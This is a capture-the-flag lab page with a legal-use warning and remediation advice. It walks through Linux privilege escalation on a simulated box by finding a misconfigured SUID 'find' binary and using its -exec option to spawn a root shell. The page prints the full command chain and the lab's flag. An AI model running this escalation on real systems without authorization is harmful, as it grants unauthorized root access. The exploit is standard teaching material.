SUID Permission Hunt
Find the misconfigured SUID binary on a simulated box and use it to read a root-only flag.
↳ Based on the lesson: Linux Privilege EscalationLegal Use Only
This lab is a simulated exercise for your own Kali/CTF VM. Never run SUID searches or privilege escalation techniques against systems you do not own or have explicit written authorization to test. Unauthorized privilege escalation is a criminal offense under the CFAA and equivalent laws worldwide.
Scenario
You've gained an initial shell on a Linux target as a low-privilege user named ctfuser. The target has the hostname vr4cs-lab and you can run commands - but reading /root/flag.txt returns "Permission denied."
The sysadmin made a mistake: one of the installed tools on this box has the SUID bit set when it shouldn't. SUID (Set User ID on execution) means the binary runs as the file's owner (root, in most cases) regardless of who launches it. If a SUID binary allows reading arbitrary files or spawning a shell, it's your path to root.
Your job: find the misconfigured SUID binary and exploit it to read /root/flag.txt.
Your Objective
- Enumerate all SUID binaries on the system
- Identify which one is non-standard (shouldn't have SUID)
- Exploit it to read
/root/flag.txt - Document the exploit path
Hints
Finding SUID Binaries
The find command with -perm -4000 searches for SUID binaries. Run it from / to scan the whole filesystem. Redirect errors to /dev/null so permission-denied noise doesn't pollute your output.
Recognizing Non-Standard SUID
Compare your findings against the standard SUID binaries that ship with a clean Kali install (sudo, passwd, newgrp, su, pkexec, ping, mount, umount). Any SUID binary not in that list is suspicious. Text editors, scripting interpreters (python, perl, bash, vim, less, awk) and file utilities (cp, cat, find) should never have SUID in a properly configured system.
GTFOBins
GTFOBins (gtfobins.github.io) catalogs exactly how to exploit SUID binaries. Search the binary name there - most SUID binaries have a documented SUID exploitation path that drops you to a root shell or lets you read arbitrary files.
Walkthrough
Step 1: Find all SUID binaries
$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/find # <-- this is not standard!
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/find with the SUID bit is the misconfigured binary. find is a standard utility that should never run as root. Any SUID bit on it means it can be abused.
Step 2: Confirm SUID bit on find
$ ls -la /usr/bin/find
-rwsr-xr-x 1 root root 224112 Oct 5 2023 /usr/bin/findThe s in the owner execute position (rws) confirms the SUID bit is set. This binary will execute as root regardless of who runs it.
Step 3: Exploit using GTFOBins technique
GTFOBins documents that find with SUID can execute arbitrary commands via the -exec flag, running as the effective UID (root):
# Spawn a root shell:
$ /usr/bin/find . -exec /bin/bash -p \; -quit
bash-5.2# whoami
root
bash-5.2# id
uid=1001(ctfuser) gid=1001(ctfuser) euid=0(root)The -p flag tells bash to preserve the elevated effective UID instead of dropping it. You now have a root-privileged shell.
Step 4: Read the flag
bash-5.2# cat /root/flag.txt
VR4CS{su1d_f1nd_1s_r00t_1n_d1sgu1s3}Solution
The misconfigured binary was /usr/bin/find with SUID set. The exploit was:
find / -perm -4000 -type f 2>/dev/null # enumerate SUID binaries
/usr/bin/find . -exec /bin/bash -p \; -quit # spawn root shell via find -exec
cat /root/flag.txt # read the flagRoot cause: Someone ran chmod u+s /usr/bin/find on this system - possibly to "make something work" without understanding the security implications. The correct remediation is chmod u-s /usr/bin/find to remove the SUID bit.
Takeaway: SUID is one of the first things to check during Linux privilege escalation. The combination of find -perm -4000 to enumerate and GTFOBins to look up exploitation paths is a standard workflow on every CTF box and real penetration test.